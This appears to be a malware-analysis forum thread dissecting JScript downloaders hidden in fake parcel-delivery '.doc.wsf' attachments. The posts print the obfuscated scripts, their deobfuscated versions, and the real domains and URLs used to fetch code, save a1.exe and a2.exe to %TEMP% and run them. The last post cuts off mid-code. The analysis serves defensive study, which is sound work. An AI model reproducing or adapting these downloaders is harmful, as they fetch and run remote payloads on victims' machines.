http://domaine3/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=22
http://domaine4/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=32
http://domaine5/counter/?i=LXB76Wmr-KAV4AvmijAj-D2-4mmIQs9_fnJwrpOWmdOm2oN_pSSIqogJgRiEagXXjZjJHeiXcM6L36bV6MdACTU&a=18nHQkcmM2HvV7pqRzAStNNrmNGpUe8hfX&r=42

Payload :

Path : %TEMP% (example : C:\Users\DardiM\AppData\Local\Temp)​

 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From MV 02_01_2016 : https://malwaretips.com/threads/2-1-2017-6.67116/
Thanks to @silversurfer

Undelivered-Parcel-ID-0000525244.doc.wsf

1) What it looks like :

The code is a bit longer than the previous samples.

<job>
<script language=JScript>

function rox() {
return "5525262";

=> IMPORTANT : this value is put in a parameter of the complete URL, to represent the value that will replace the "a" in the response text, after the http request.​
};

function gag() {

return "Msxml2.XMLHTTP";

=> String that will be used to create the http object, used to for the http request​
};
var x = new Array(

"windycrestrental.com",
"vousgagnezaetreconnu.autoportrait.com",
"zodia-q.com",
"cobycaresfoundation.org",
"www .yabaojiuhe.com"​
);

=> Array of the domains that will be used to build the complete URLs for the requests
function rov() {
return "counter";

=> one of the part added for the completes URLs​
}

function cou() {

return "/" + rov() + "/?a=";

=> returns "/counter/?a=" : another part for the complete URLs
};

function fiv() {

return "a";

=> returns "a" : for the char replacement on the string text received after the http request
=> will replace the obfuscated part : 5525262​
};

function cay(z) {

z = z.split(rox());
z = z.join(fiv());

=> similar to a replace of all rox() content ( "5525262") by fiv() '("a") on the encoded string received
=> first deobfuscation​
eval(z);

=> here, the obfuscated text received,is evaluated / run, after the first deobfuscation
=> I will show later its content : a string with fonction that build a var a , another string, will real malware part (downloader of payloads and run)​
};

function boe() {

return "&i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw";

=> another parameter+ value for the URLs built​
};

function htt() {

return "http://";

=> returns the first part of the future URLs
};

function sut() {

return "19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&m=";

=> a part of the future URLs (value of precedent parameter not present here + parameter without its value)​
};

function tog(x) {

return htt() + x + cou() + sut() + rox() + boe();

=> function used to build the whole URL with one domain as parameter
=> function called from the loop for below
};
for (var i = 0; i < 5; i++) {

try {
var e = new ActiveXObject(gag());

=> e = ActiveXObject("Msxml2.XMLHTTP")
=> e : http object
e.open("GET", tog(x[ i ]), false);

=> http.open("GET", complete_URL_current_index ,false)
=> opens a connection to the current built URL

x[ i ] : domain from array, with current index i (i = 0 to 4 max)

tog(x[ i ]) : htt() + x + cou() + sut() + rox() + boe();

=> "http://" + current_domain + "/" + "counter" + "/?a= + "19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&m=" + "5525262" +
"&i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw"

=> will try will each domain from the array seen above, until it findq a working one.

http://domain/counter/?a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&m=5525262&i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw

Remember the domains :

var x = new Array(
"windycrestrental.com",
"vousgagnezaetreconnu.autoportrait.com",
"zodia-q.com",
"cobycaresfoundation.org",
"www .yabaojiuhe.com"
);
e.send();

=> sends the request
if (e.status == 200) {

=> status of the http request : 200 => OK : connection was a success !
cay(e.responseText);

=> calls the function that will deobuscate the text received​
break;
};
} catch (e) {};
};
</script>​
</job>

2) The string received :

Before modification.
We can remark that 5525262 appears a lot of time : remember it was a parameter passed to the URL used as request. The webpage uses this value to obfuscated the real string. Here, each 5525262 is a 'a'
Code:
v5525262r 5525262 = ""; 5525262 += 'v5525262r 5525262d='; 5525262 += '"19eQysboVPoPcZhbbztVQDcdfSzNu5t455525262"; v5525262r '; 5525262 += 'ld=0; v'; 5525262 += '5525262r cs=St'; 5525262 += 'ring.from'; 5525262 += 'Ch5525262rCode(9'; 5525262 += '2); v5525262r'; 5525262 += ' ll=["vous'; 5525262 += 'g5525262gnez5525262e'; 5525262 += 'treco'; 5525262 += 'nnu.5525262u'; 5525262 += 'toportr5525262it'; 5525262 += '.com","'; 5525262 += 'www.sport'; 5525262 += 'provo'; 5525262 += 'king.'; 5525262 += 'com","s'; 5525262 += '5525262bedori55252625525262l'; 5525262 += 'tern5525262tiv5525262.'; 5525262 += 'pt","m5525262ggi'; 5525262 += 'eellisbusi'; 5525262 += 'nessco'; 5525262 += 'nsulting.'; 5525262 += 'com",'; 5525262 += '"infl5525262'; 5525262 += 'tion.'; 5525262 += 'us"]; v5525262r '; 5525262 += 'ws=WScript'; 5525262 += '.Cre5525262'; 5525262 += 'teObject('; 5525262 += '"WScript.S'; 5525262 += 'hell"); '; 5525262 += 'v5525262r fn=ws'; 5525262 += '.Exp5525262ndEn'; 5525262 += 'vironme'; 5525262 += 'ntString'; 5525262 += 's("%TE'; 5525262 += 'MP%")+c'; 5525262 += 's+"5525262"; '; 5525262 += 'v5525262r xo=WSc'; 5525262 += 'ript.Cre'; 5525262 += '5525262teObjec'; 5525262 += 't("Msxm'; 5525262 += 'l2.XMLHTTP'; 5525262 += '"); v'; 5525262 += '5525262r x5525262=WScr'; 5525262 += 'ipt.Cre5525262'; 5525262 += 'teObject('; 5525262 += '"ADODB'; 5525262 += '.Stre5525262m'; 5525262 += '"); v5525262r'; 5525262 += ' fo=WSc'; 5525262 += 'ript.Cr'; 5525262 += 'e5525262teO'; 5525262 += 'bject('; 5525262 += '"Scriptin'; 5525262 += 'g.File'; 5525262 += 'SystemObj'; 5525262 += 'ect"); if'; 5525262 += ' (!fo'; 5525262 += '.FileEx'; 5525262 += 'ists(f'; 5525262 += 'n+".t'; 5525262 += 'xt")) '; 5525262 += '{ v5525262r f'; 5525262 += 'p=fo.C'; 5525262 += 're5525262teT'; 5525262 += 'extFile(fn'; 5525262 += '+".tx'; 5525262 += 't",true);'; 5525262 += ' fp.WriteL'; 5525262 += 'ine(""); '; 5525262 += 'fp.Clos'; 5525262 += 'e(); for'; 5525262 += '(v5525262r n='; 5525262 += '1;n<=2;n'; 5525262 += '++) {'; 5525262 += ' for(v'; 5525262 += '5525262r i=ld;'; 5525262 += 'i<ll.'; 5525262 += 'length'; 5525262 += ';i++) {'; 5525262 += ' v5525262r d'; 5525262 += 'n=0; tr'; 5525262 += 'y { xo.op'; 5525262 += 'en("GET"'; 5525262 += ',"http://'; 5525262 += '"+ll['; 5525262 += 'i]+"/cou'; 5525262 += 'nter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwUL5525262xvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&'; 5525262 += '5525262="+5525262d+"&r'; 5525262 += '="+i+n, '; 5525262 += 'f5525262lse); '; 5525262 += 'xo.send();'; 5525262 += ' if(xo.s'; 5525262 += 't5525262tus==2'; 5525262 += '00) { x5525262'; 5525262 += '.open();'; 5525262 += ' x5525262.type='; 5525262 += '1; x5525262'; 5525262 += '.write(xo'; 5525262 += '.respons'; 5525262 += 'eBody); i'; 5525262 += 'f(x5525262.size'; 5525262 += '>1000'; 5525262 += '0) { dn'; 5525262 += '=1; x5525262.'; 5525262 += 's5525262veToFil'; 5525262 += 'e(fn+n+".'; 5525262 += 'exe",'; 5525262 += '2); try{'; 5525262 += 'ws.Ru'; 5525262 += 'n(fn+'; 5525262 += 'n+".exe"'; 5525262 += ',1,0);}'; 5525262 += 'c5525262tch'; 5525262 += '(er){}; };'; 5525262 += ' x5525262.close('; 5525262 += '); }; '; 5525262 += 'if(dn'; 5525262 += '==1){'; 5525262 += 'ld=i;bre5525262'; 5525262 += 'k;}; } '; 5525262 += 'c5525262tch('; 5525262 += 'er){}; };'; 5525262 += ' }; }'; 5525262 += ';'; //ev5525262l(5525262);

After first deobuscation and some formatting:

Code:
var a = "";
a += 'var a';
a += 'd="19eQysboVPoPcZhbbztVQDcdfSzNu5t45a"; va';
a += 'r ld=0; ';
a += 'var cs=St';
a += 'ring.from';
a += 'CharCo';
a += 'de(92)';
a += '; var ll=';
a += '["sabed';
a += 'oriaalte';
a += 'rnati';
a += 'va.pt",';
a += '"maggie';
a += 'ellisbus';
a += 'inessco';
a += 'nsulting';
a += '.com","ww';
a += 'w.sport';
a += 'provokin';
a += 'g.com","';
a += 'vousgagnez';
a += 'aetre';
a += 'connu.a';
a += 'utoportrai';
a += 't.com"';
a += ',"spiritdo';
a += 'ula.net"]';
a += '; var ws=W';
a += 'Script.C';
a += 'reate';
a += 'Object("WS';
a += 'cript';
a += '.Shell")';
a += '; var fn';
a += '=ws.Expa';
a += 'ndEnvir';
a += 'onmentStri';
a += 'ngs("%TEMP';
a += '%")+cs+"a"';
a += '; var xo';
a += '=WScript.';
a += 'CreateObje';
a += 'ct("Msxml2';
a += '.XMLHTTP")';
a += '; var xa=W';
a += 'Script';
a += '.CreateO';
a += 'bject("';
a += 'ADODB.';
a += 'Stream"); ';
a += 'var f';
a += 'o=WScrip';
a += 't.Create';
a += 'Object("Sc';
a += 'ripting';
a += '.FileSys';
a += 'temObject"';
a += '); if (!f';
a += 'o.FileE';
a += 'xists(fn';
a += '+".txt")) ';
a += '{ var f';
a += 'p=fo.Crea';
a += 'teTextFil';
a += 'e(fn+".t';
a += 'xt",t';
a += 'rue); fp';
a += '.WriteLine';
a += '("");';
a += ' fp.Cl';
a += 'ose();';
a += ' for(var ';
a += 'n=1;n<=';
a += '2;n++';
a += ') { for(v';
a += 'ar i=ld;i<';
a += 'll.le';
a += 'ngth;';
a += 'i++) {';
a += ' var dn';
a += '=0; try ';
a += '{ xo.op';
a += 'en("GE';
a += 'T","htt';
a += 'p://"+l';
a += 'l[i]+"/c';
a += 'ounte';
a += 'r/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw';
a += '&a="+';
a += 'ad+"&r';
a += '="+i+n';
a += ', false);';
a += ' xo.send';
a += '(); if';
a += '(xo.st';
a += 'atus==200';
a += ') { xa';
a += '.open';
a += '(); xa.ty';
a += 'pe=1; xa.w';
a += 'rite(x';
a += 'o.resp';
a += 'onseB';
a += 'ody);';
a += ' if(xa.';
a += 'size>';
a += '10000';
a += ') { dn=';
a += '1; xa.save';
a += 'ToFile(f';
a += 'n+n+".';
a += 'exe",2';
a += '); try{';
a += 'ws.Run(fn';
a += '+n+".';
a += 'exe",';
a += '1,0);}';
a += 'catch(';
a += 'er){}; }; ';
a += 'xa.cl';
a += 'ose(); }';
a += '; if(dn==1';
a += '){ld=i';
a += ';break';
a += ';}; } ';
a += 'catch(er){';
a += '}; }; }; }';
a += ';';
//eval(a);

3) The code in clear :

Code:
v
var ad = "19eQysboVPoPcZhbbztVQDcdfSzNu5t45a";
var ld = 0;
var cs = String.fromCharCode(92);
var ll = ["sabedoriaalternativa.pt", "maggieellisbusinessconsulting.com", "www.sportprovoking.com", "vousgagnezaetreconnu.autoportrait.com", "spiritdoula.net"];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
if (!fo.FileExists(fn + ".txt")) {
    var fp = fo.CreateTextFile(fn + ".txt", true);
    fp.WriteLine("");
    fp.Close();
    for (var n = 1; n <= 2; n++) {
        for (var i = ld; i < ll.length; i++) {
            var dn = 0;
            try {
                xo.open("GET", "http://" + ll[i] + "/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=" + ad + "&r=" + i + n, false);
                xo.send();
                if (xo.status == 200) {
                    xa.open();
                    xa.type = 1;
                    xa.write(xo.responseBody);
                    if (xa.size > 10000) {
                        dn = 1;
                        xa.saveToFile(fn + n + ".exe", 2);
                        try {
                            ws.Run(fn + n + ".exe", 1, 0);
                        } catch (er) {};
                    };
                    xa.close();
                };
                if (dn == 1) {
                    ld = i;
                    break;
                };
            } catch (er) {};
        };
    };
};
};

4) Details :

var ad = "19eQysboVPoPcZhbbztVQDcdfSzNu5t45a";

=> value used as parameter of the futures URLS
var ld = 0;

=> initial index for loop on domainds
var cs = String.fromCharCode(92);

=> char : \​

var ll = [

"sabedoriaalternativa.pt",
"maggieellisbusinessconsulting.com",
"w w w .sportprovoking.com",
"vousgagnezaetreconnu.autoportrait.com",
"spiritdoula.net"​
];

=> array of domains to be used to download the payloads​

var ws = WScript.CreateObject("
WScript.Shell");

=> creates a Shell object Shell to use later its run method : run the payloads​

var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";

=> fn : filename : %TEMP% \ a
example : C:\Users\DardiM\AppData\Local\Temp\a​


var xo = WScript.CreateObject("
Msxml2.XMLHTTP");

=> creates a http object, for the request : to try to download the two payloads​

var xa = WScript.CreateObject("ADODB.Stream");

=> Creates a Stream object, to store the received from the request, and save it to a local file
var fo = WScript.CreateObject("Scripting.FileSystemObject");

=> creates an object to manipulate file /folder
if (!fo.FileExists(fn + ".txt")) {

=> Example : test if C:\Users\DardiM\AppData\Local\Temp\a.txt exists : if yes, job already done
=> this a.txt file is used as clue to know if this deobfuscated part has already be run.​

var fp = fo.CreateTextFile(fn + ".txt", true);

=> Example : creates C:\Users\DardiM\AppData\Local\Temp\a.txt
fp.WriteLine("");

=> Write a blank line on a.txt
fp.Close();

=> closes a.txt


Here, the two nested loops to dowlooad the two payload (a1.exe and a2.exe) :
- First loop for the payload (two available) : n : 1 and 2
- Second loop for the URL built : 5 available : i : 0 , 1, 2, 3, 4


for (var n = 1; n <= 2; n++) {
for (var i = ld; i < ll.length; i++) {
var dn = 0;
try {
xo.open("GET", "http://" + ll[ i ] + "/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=" + ad + "&r=" + i + n, false);

=> builds the URL for current payload and domain, and open the http request
=> ll[ i ] : i => current index => retrieve the correspondent domain from the array
=> the complete URL will take into account the current payload needed, the current domain and some parameters
(See the first post for details, and the conclusion of this current post for all possibilities.

Remember :
var ll = [
"sabedoriaalternativa.pt",
"maggieellisbusinessconsulting.com",
"w w w .sportprovoking.com",
"vousgagnezaetreconnu.autoportrait.com",
"spiritdoula.net"
];
xo.send();

=> sends the request
if (xo.status == 200) {

=> 200 : request OK :
xa.open();

=> opens the stream
xa.type = 1;

=> 1 : data that will be store inside the stream have to be considered as binary
xa.write(xo.responseBody);

=> stores on the stream object the data received bt the request : the payload data
if (xa.size > 10000) {

=> if size is > 10000 : considered as a valid payload
dn = 1;

=> flag (=clue) to remember the current payload has been successfully downloaded
=> the current URLwill be used for the next payload, because it is a working URL
xa.saveToFile(fn + n + ".exe", 2);

=> saves to a file the current payload

=> Example :

- C:\Users\DardiM\AppData\Local\Temp\a1.exe
- C:\Users\DardiM\AppData\Local\Temp\a2.exe
try {
ws.Run(fn + n + ".exe", 1, 0);

=> runs the current payload
} catch (er) {};
};
xa.close();

=> closes the stream object, use to store the data from the http request, and to save them to a exe file on HD​
};
if (dn == 1) {

=> flag (=clue) to remember the current payload has been successfully downloaded​
ld = i;

=> the current URL will be used for the next payload, because it is a working URL​
break;
};
} catch (er) {};
};
};
};

5) Conclusion

First script : some differences with other samples analized before.
Deobuscated downloaded part : exactly the same method used than in the previous samples, only the URLs are different.

URLs to download the JScript code :

Domains :

windycrestrental.com
vousgagnezaetreconnu.autoportrait.com
zodia-q.com
cobycaresfoundation.org
www. yabaojiuhe.com​
http://domain/counter/?a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&m=5525262&i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw​

5525262 : the part that replace the char 'a' in the received text from http request

URLs to download the Payloads :

Domains :
sabedoriaalternativa.pt
maggieellisbusinessconsulting.com
www .sportprovoking.com
vousgagnezaetreconnu.autoportrait.com
spiritdoula.net

a1.exe :

http://domain1/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=01
http://domain2/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=11
http://domain3/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=21
http://domain4/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=31
http://domain5/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=41​
a2.exe :

http://domain1/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=02
http://domain2/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=12
http://domain3/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=22
http://domain4/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=32
http://domain5/counter/?i=LW6Ac5KwgFjsXs3nitZ__brY4I9qwVUywZNgz9Cvpc_m-r9HJlrwULaxvfy8q3vtbZvufB30ZXpp6TRzmrXUS9NLxEldLw&a=19eQysboVPoPcZhbbztVQDcdfSzNu5t45a&r=42​

Payloads :


a1.jpg

a2.exe :


a2.jpg
 
Last edited:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
From https://malwaretips.com/threads/13-01-2016-22.67512/
Thanks to @Der.Reisende

Item-Delivery-Details-00000629997.doc.wsf

Why this sample ?
Because new modifications have been made on the downloader.

As usual : modifications have been made to avoid copy-paste => run => infection :p

<job>
<script language=JScript>
var z2 = eval;
var x = new Array("sergeytattoo.ru", "ru.ifo.su", "vensa.nl", "quatresaisonsaujardin.com", "eternitydevelop.heyshop.eu");
var m = "4734489";
var z3 = "?a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&m=";
z3 += m;
var z1 = "
Msxml2.XMLHTTP";
z3 += "&i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA";
for (var i = 0; i < 5; i++) {

try {
var e = new ActiveXObject(z1);
var z4 = z2;
e.open("GET", "http ://" + x[ i ] + "/counter/" + z3, false);
e.send();
if (e.status == 2 * 100) {
z4(e.responseText.split(m).join("a"));
break;
};
} catch (e) {};
};
</script>​
</job>

The method used on previous samples :

- tries to download from different urls (if needed) an obfuscated text,
- saved it as string once deobfuscated,
- eval the string to run the real "bad" part : the downloader and runner of a1.exe and a2.exe : 2 payloads (always these names are used)
Here, the main change are :

var z2 = eval;

var z4 = z2;

z4(e.
responseText.split(m).join("a"));
=> it tries to hide the evaluation on var z4 .
=> the received text is not saved in a var : directly deobfuscated and run.
z4(e.responseText.split(m).join("a"));

is :

eval(http.responseTex.split("4734489").join("a"))

=> evaluates the received string after have replaced all "4734489" by "a" <=> .split("4734489").join("a")
Domains used :

var x = new Array(
"sergeytattoo.ru",
"ru.ifo.su", "vensa.nl",
"quatresaisonsaujardin.com",
"eternitydevelop.heyshop.eu"​
);
URLs built :

http ://domain/counter/?a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&m=4734489&i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA
String received :
Code:
"var a = ""; a += 'var ad="1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj"'; a += '; var ld=0'; a += '; var c'; a += 's=Stri'; a += 'ng.fro'; a += 'mCharCode('; a += '92); var'; a += ' ll=["lacr'; a += 'ossetr'; a += 'avel.com",'; a += '"sergey'; a += 'tattoo'; a += '.ru","no'; a += 'bilisasse'; a += 'ssoria.co'; a += 'm.br","ru.'; a += 'ifo.su"'; a += ',"cecichu'; a += 'rrascoemdo'; a += 'micili'; a += 'o.com.'; a += 'br"]; var'; a += ' ws=WScr'; a += 'ipt.C'; a += 'reate'; a += 'Object("W'; a += 'Script'; a += '.Shell");'; a += ' var fn='; a += 'ws.Ex'; a += 'pandEnviro'; a += 'nmentStri'; a += 'ngs("%'; a += 'TEMP%'; a += '")+cs'; a += '+"a"; var'; a += ' xo=WScr'; a += 'ipt.Create'; a += 'Objec'; a += 't("Msx'; a += 'ml2.XMLHTT'; a += 'P"); var'; a += ' xa=WSc'; a += 'ript.Cre'; a += 'ateObject('; a += '"ADOD'; a += 'B.Stre'; a += 'am"); v'; a += 'ar fo=WScr'; a += 'ipt.Create'; a += 'Object("'; a += 'Scripti'; a += 'ng.FileS'; a += 'ystemObjec'; a += 't"); if '; a += '(!fo.Fi'; a += 'leExi'; a += 'sts(fn+".t'; a += 'xt")) '; a += '{ var fp'; a += '=fo.Crea'; a += 'teText'; a += 'File(fn'; a += '+".txt",tr'; a += 'ue); f'; a += 'p.Wri'; a += 'teLine('; a += '""); f'; a += 'p.Close('; a += '); for(va'; a += 'r n=1'; a += ';n<=2;'; a += 'n++) {'; a += ' for(va'; a += 'r i=ld;i'; a += '<ll.leng'; a += 'th;i++'; a += ') { va'; a += 'r dn=0;'; a += ' try { x'; a += 'o.open("'; a += 'GET","htt'; a += 'p://"+ll[i'; a += ']+"/counte'; a += 'r/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&'; a += 'a="+ad+"&'; a += 'r="+i+n,'; a += ' false);'; a += ' xo.se'; a += 'nd();'; a += ' if(xo.st'; a += 'atus==200)'; a += ' { xa.'; a += 'open(); xa'; a += '.type='; a += '1; xa'; a += '.write('; a += 'xo.res'; a += 'ponse'; a += 'Body)'; a += '; if(x'; a += 'a.size>1'; a += '0000) { dn'; a += '=1; xa.s'; a += 'aveToFi'; a += 'le(fn+n'; a += '+".exe",2)'; a += '; try{'; a += 'ws.Run(fn+'; a += 'n+".exe",'; a += '1,0);'; a += '}catch(er'; a += '){}; }; '; a += 'xa.close('; a += '); };'; a += ' if(dn==1)'; a += '{ld=i'; a += ';break'; a += ';}; } c'; a += 'atch(er)'; a += '{}; }; }; '; a += '};'; _eval(a);"

=> at the end : eval(a)
=> builds a new string and runs it.

It is the same deobfuscated downloader that have been seen on previous post, so I will only show domains & URLs used:

Domains used:

var ll = [
"lacrossetravel.com",
"sergeytattoo.ru",
"nobilisassessoria.com.br",
"ru.ifo.su",
"cecichurrascoemdomicilio.com.br"​
];

All available URLs to download a1.exe :

http ://domain1/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=01
http ://domain2/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=11
http ://domain3/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=21
http ://domain4/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=31
http ://domain5/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=41
All available URLs to download a2.exe :

http ://domain1/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=02"
"http ://domain2/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=12
http :/domain3r/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=22
http ://domain4/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=32
http ://domain5/counter/?i=TZB_8hCq_t5o48lnidKZRLm_Z2xo38j_fIrO1QiQe7LH5ft8IiKP0onur8RpOnF_PfHlN8e8WOWkNgtnXA&a=1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj&r=42​

Payloads :

 

Svoll

Level 13
Verified
Top Poster
Well-known
Nov 17, 2016
627
From https://malwaretips.com/threads/13-01-2016-22.67512/
Thanks to @Der.Reisende

Item-Delivery-Details-00000629997.doc.wsf


Code:
"var a = ""; a += 'var ad="1NUDeZyyvDv3aBr2vKRjE25nvcVgLynWPj"'; a += '; var ld=0'; a += '; var c'; a += 's=Stri'; a += 'ng.fro'; a += 'mCharCode('; a += '92); var'; a += ' ll=["lacr'; a += 'ossetr'; a += 'avel.com",'; a += '"sergey'; a += 'tattoo'; a += '.ru","no'; a += 'bilisasse'; a += 'ssoria.co'; a += 'm.br","ru.'; a += 'ifo.su"'; a += ',"cecichu'; a += 'rrascoemdo'; a += 'micili'; a += 'o.com.'; a += 'br"]; var'; a += ' ws=WScr'; a += 'ipt.C'; a += 'reate'; a += 'Object("W'; a += 'Script'; a += '.Shell");'; a += ' var fn='; a += 'ws.Ex'; a += 'pandEnviro'; a += 'nmentStri'; a += 'ngs("%'; a += 'TEMP%'; a += '")+cs'; a += '+"a"; var'; a += ' xo=WScr'; a += 'ipt.Create'; a += 'Objec'; a += 't("Msx'; a += 'ml2.XMLHTT'; a += 'P"); var'; a += ' xa=WSc'; a += 'ript.Cre'; a += 'ateObject('; a += '"ADOD'; a += 'B.Stre'; a += 'am"); v'; a += 'ar fo=WScr'; a += 'ipt.Create'; a += 'Object("'; a += 'Scripti'; a += 'ng.FileS'; a += 'ystemObjec'; a += 't"); if '; a += '(!fo.Fi'; a += 'leExi'; a += 'sts(fn+".t'; a += 'xt")) '; a += '{ var fp'; a += '=fo.Crea'; a += 'teText'; a += 'File(fn'; a += '+".txt",tr'; a += 'ue); f'; a += 'p.Wri'; a += 'teLine('; a += '""); f'; a += 'p.Close('; a += '); for(va'; a += 'r n=1'; a += ';n<=2;'; a += 'n++) {'; a += ' for(va'; a += 'r i=ld;i'; a += 